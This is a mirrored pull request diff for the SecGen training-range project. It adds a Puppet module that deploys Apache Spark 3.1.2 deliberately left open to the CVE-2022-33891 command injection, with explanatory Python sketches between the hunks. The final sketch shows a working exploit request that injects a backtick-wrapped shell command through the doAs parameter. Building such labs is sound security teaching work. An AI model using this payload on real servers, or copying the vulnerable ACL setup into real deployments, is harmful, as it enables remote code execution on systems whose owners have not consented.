Mirror of https://github.com/cliffe/SecGen.git (synced 2026-02-21 11:18:06 +00:00)

Merge pull request #251 from JD2344/apache_spark
Add apache spark exploit
@@ -0,0 +1,11 @@
# apache spark rce init
# https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz
# https://spark.apache.org/docs/3.1.2/
# https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
contain apache_spark_rce::install
contain apache_spark_rce::configure
contain apache_spark_rce::service
Class['apache_spark_rce::install']
-> Class['apache_spark_rce::configure']
-> Class['apache_spark_rce::service']
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
spark.acls.enable true
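This one-line spark-defaults.conf entry is what makes the deployment vulnerable: with spark.acls.enable set to true, UI requests go through the HttpSecurityFilter code path that CVE-2022-33891 abuses. A minimal Python sketch (not part of the module) for checking that a deployed config actually enables the flag; the path is the one configure.pp installs to:

# Sanity-check sketch: does spark-defaults.conf enable ACLs?
def acls_enabled(conf_path: str = "/usr/local/spark/conf/spark-defaults.conf") -> bool:
    with open(conf_path) as f:
        for line in f:
            parts = line.split()
            # spark-defaults.conf format: "<key> <value>" per line
            if len(parts) == 2 and parts[0] == "spark.acls.enable":
                return parts[1].lower() == "true"
    return False  # Spark's default is false

print(acls_enabled())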
@@ -0,0 +1,12 @@
function apache_spark_rce::cpandbuild(Array $collection, String $filename) {
  $collection.each |String $item| {
    file { "/tmp/${item}":
      ensure => file,
      source => "puppet:///modules/apache_spark_rce/${item}",
    }
  }
  exec { "rebuild-${filename}":
    cwd     => '/tmp/',
    command => "/bin/cat ${filename}.parta* >${filename}",
  }
}
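This function copies each binary chunk out of the module's files/ directory into /tmp and concatenates them in lexical order, so file.partaa + file.partab + ... becomes the original archive. The same reassembly as a Python sketch:

# Reassemble <filename>.parta* chunks into <filename>, mirroring the
# "/bin/cat <filename>.parta* ><filename>" exec above; sorted() gives
# the same lexical order the shell glob does.
from pathlib import Path

def rebuild(directory: str, filename: str) -> None:
    parts = sorted(Path(directory).glob(f"{filename}.parta*"))
    with open(Path(directory) / filename, "wb") as out:
        for part in parts:
            out.write(part.read_bytes())

rebuild("/tmp", "scala-2.12.10.deb")  # filename from install.pp below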
@@ -0,0 +1,26 @@
# Class: apache_spark_rce::configure
# Configure apache spark and secgen
#
class apache_spark_rce::configure {
  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
  $sparkconf = 'spark-defaults.conf'
  $leaked_filenames = $secgen_parameters['leaked_filenames']
  $strings_to_leak = $secgen_parameters['strings_to_leak']

  Exec { path => [ '/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/' ] }

  # We set the acls flag in the config - this ensures it's vulnerable
  file { "/usr/local/spark/conf/${sparkconf}":
    ensure => file,
    source => "puppet:///modules/apache_spark_rce/${sparkconf}",
  }

  ::secgen_functions::leak_files { 'spark-flag-leak':
    storage_directory => '/usr/local/spark/bin/',
    leaked_filenames  => $leaked_filenames,
    strings_to_leak   => $strings_to_leak,
    owner             => 'root',
    mode              => '0750',
    leaked_from       => 'apache_spark_rce',
  }
}
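secgen_functions::leak_files is SecGen's shared flag-planting helper; its source is not part of this diff, so the following is only a rough sketch of the behaviour its parameter names imply (each string to leak written to the matching leaked filename under the storage directory, root-owned, mode 0750):

# Rough sketch of the presumed effect of the leak_files resource above,
# inferred from its parameter names, not from SecGen's actual helper.
import os
from pathlib import Path

def leak_files(storage_directory: str, leaked_filenames: list[str],
               strings_to_leak: list[str], mode: int = 0o750) -> None:
    for name, secret in zip(leaked_filenames, strings_to_leak):
        path = Path(storage_directory) / name
        path.write_text(secret + "\n")  # the flag an attacker reads post-exploit
        os.chmod(path, mode)
        os.chown(path, 0, -1)           # owner => 'root' (requires root)

leak_files("/usr/local/spark/bin/", ["flag.txt"], ["flag{example}"])  # hypothetical values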
@@ -0,0 +1,64 @@
# Class: apache_spark_rce::install
# install process
# https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz
# https://www.scala-lang.org/download/2.12.10.html
class apache_spark_rce::install {
  Exec { path => [ '/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/' ] }
  $modulename = 'apache_spark_rce'

  # Install required packages
  # NOTE: once Debian ships scala 2.12+, add it to this ensure_packages statement
  ensure_packages(['openjdk-11-jdk'], { ensure => 'installed' })

  $scaladeb = 'scala-2.12.10.deb'
  $releasename = 'spark-3.1.2-bin-hadoop3.2.tgz'
  $shortrelease = 'spark-3.1.2-bin-hadoop3.2'

  $scalapart = ["${scaladeb}.partaa",
                "${scaladeb}.partab",
                "${scaladeb}.partac"]

  $sparkpart = ["${releasename}.partaa",
                "${releasename}.partab",
                "${releasename}.partac",
                "${releasename}.partad",
                "${releasename}.partae"]

  $pkgtobuild = [[$scalapart, $scaladeb], [$sparkpart, $releasename]]
  $pkgtobuild.each |Array $pkg| {
    apache_spark_rce::cpandbuild($pkg[0], $pkg[1])
  }

  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
  $user = $secgen_parameters['leaked_username'][0]

  $user_home = "/home/${user}"

  # Create user
  user { $user:
    ensure     => present,
    home       => $user_home,
    managehome => true,
  }

  # We run older versions of Debian; for now, install Scala from the local deb file
  package { 'scala':
    ensure   => latest,
    provider => apt,
    source   => "/tmp/${scaladeb}",
  }

  exec { 'unpack-spark':
    cwd     => '/tmp',
    command => "tar -xf ${releasename}",
    creates => '/usr/local/spark',
  }
  -> exec { 'move-spark':
    cwd     => '/tmp',
    command => "mv /tmp/${shortrelease} /usr/local/spark/",
    creates => '/usr/local/spark',
  }
  -> exec { 'chown-spark':
    command => "chown -R ${user} /usr/local/spark/",
  }
}
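The eight "Binary file not shown." entries earlier in the diff are exactly these .parta* chunks (three for the Scala deb, five for the Spark tarball). Splitting the archives keeps each blob under Git hosting per-file limits (GitHub rejects files over 100 MB). A sketch of how the chunks could have been produced, equivalent in spirit to split(1) with a .part prefix; the 50 MiB chunk size is an assumption:

# Split a large archive into <name>.partaa, <name>.partab, ... so that
# cpandbuild can later reassemble it with cat. Roughly equivalent to:
#   split -b 50M spark-3.1.2-bin-hadoop3.2.tgz spark-3.1.2-bin-hadoop3.2.tgz.part
import string
from pathlib import Path

def split_file(path: str, chunk_mib: int = 50) -> None:  # 50 MiB is an assumption
    data = Path(path).read_bytes()
    size = chunk_mib * 1024 * 1024
    for i, offset in enumerate(range(0, len(data), size)):
        suffix = string.ascii_lowercase[i]  # handles up to 26 chunks
        Path(f"{path}.parta{suffix}").write_bytes(data[offset:offset + size])

split_file("spark-3.1.2-bin-hadoop3.2.tgz")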
@@ -0,0 +1,23 @@
# Class: apache_spark_rce::service
# Service to start the Spark standalone master
#
class apache_spark_rce::service {
  $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
  $port = $secgen_parameters['port'][0]
  $user = $secgen_parameters['leaked_username'][0]

  Exec { path => [ '/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/' ] }

  exec { 'set-port':
    command => "sed -i 's/8080/${port}/' /usr/local/spark/sbin/start-master.sh",
  }
  -> file { '/etc/systemd/system/spark.service':
    content => template('apache_spark_rce/spark.service.erb'),
    owner   => 'root',
    mode    => '0777',
  }
  -> service { 'spark':
    ensure => running,
    enable => true,
  }
}
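The sed in 'set-port' swaps Spark's default master UI port (8080) for the SecGen-generated one before the unit ever starts. A throwaway sketch for confirming the UI came up after systemctl start spark; host and port here are placeholders:

# Probe the Spark master UI port; a plain TCP connect is enough to tell
# whether start-master.sh bound the rewritten port.
import socket

def ui_up(host: str = "127.0.0.1", port: int = 8080, timeout: float = 2.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(ui_up(port=8080))  # substitute the SecGen-assigned port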
@@ -0,0 +1,66 @@
<?xml version="1.0"?>
<vulnerability xmlns="http://www.github/cliffe/SecGen/vulnerability"
               xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xsi:schemaLocation="http://www.github/cliffe/SecGen/vulnerability">

  <name>Apache Spark Unauthenticated Command Injection</name>
  <author>James Davis</author>
  <module_license>MIT</module_license>
  <description>The Apache Spark UI offers the possibility to enable ACLs via the configuration
    option spark.acls.enable. With an authentication filter, this checks whether a user has
    access permissions to view or modify the application. If ACLs are enabled, a code path in
    HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user
    name. A malicious user might then be able to reach a permission check function that will
    ultimately build a Unix shell command based on their input, and execute it. This will result
    in arbitrary shell command execution as the user Spark is currently running as. This affects
    Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to
    3.2.1.</description>

  <type>http</type>
  <privilege>user_rwx</privilege>
  <access>remote</access>
  <platform>linux</platform>
  <difficulty>low</difficulty>

  <read_fact>port</read_fact>
  <read_fact>strings_to_leak</read_fact>
  <read_fact>leaked_filenames</read_fact>

  <default_input into="port">
    <generator module_path=".*/random_unregistered_port" />
  </default_input>

  <!-- flags or other secrets exposed after exploitation -->
  <default_input into="strings_to_leak">
    <generator type="message_generator" />
  </default_input>

  <default_input into="leaked_filenames">
    <generator type="filename_generator" />
  </default_input>

  <default_input into="leaked_username">
    <generator type="username_generator" />
  </default_input>

  <!-- optional vulnerability details -->
  <cve>CVE-2022-33891</cve>
  <cvss_base_score>8.8</cvss_base_score>
  <cvss_vector>AV:N/AC:L/Au:N/C:C/I:C/A:C</cvss_vector>
  <reference>https://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html</reference>
  <reference>https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb</reference>
  <reference>https://spark.apache.org/docs/3.1.2/</reference>
  <reference>https://archive.apache.org/dist/spark/spark-3.1.2/spark-3.1.2-bin-hadoop3.2.tgz</reference>
  <software_name>Apache Spark</software_name>
  <software_license>Apache License 2.0</software_license>

  <requires>
    <type>update</type>
  </requires>

</vulnerability>
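The description above is the crux of CVE-2022-33891: the ?doAs= impersonation parameter ends up interpolated into a shell command (a shell-based group lookup along the lines of "id -Gn <user>"), so shell metacharacters in the supplied username execute on the host. A sketch of the request shape used by public PoCs such as the referenced Metasploit module; the target URL and injected command are placeholders:

# CVE-2022-33891 request sketch: the doAs "username" is wrapped in
# backticks so the shell-based group lookup executes it. The injection
# is blind; success shows up on the target (/tmp/pwned appears), not in
# the HTTP response, which may simply be a 403.
from urllib.parse import quote
from urllib.request import urlopen
from urllib.error import HTTPError

target = "http://127.0.0.1:8080"  # placeholder: Spark UI of a lab VM
command = "touch /tmp/pwned"      # placeholder: attacker-chosen command

try:
    urlopen(f"{target}/?doAs={quote('`' + command + '`')}", timeout=5)
except HTTPError:
    pass  # a 403 here is expected and does not mean the injection failed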
@@ -0,0 +1,15 @@
[Unit]
Description=Apache Spark Master
After=network.target

[Service]
Type=forking
User=<%= @user %>
Environment="PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/spark/sbin"
WorkingDirectory=/usr/local/spark/bin/
ExecStart=/usr/local/spark/sbin/start-master.sh
Restart=on-abort
RestartSec=1

[Install]
WantedBy=multi-user.target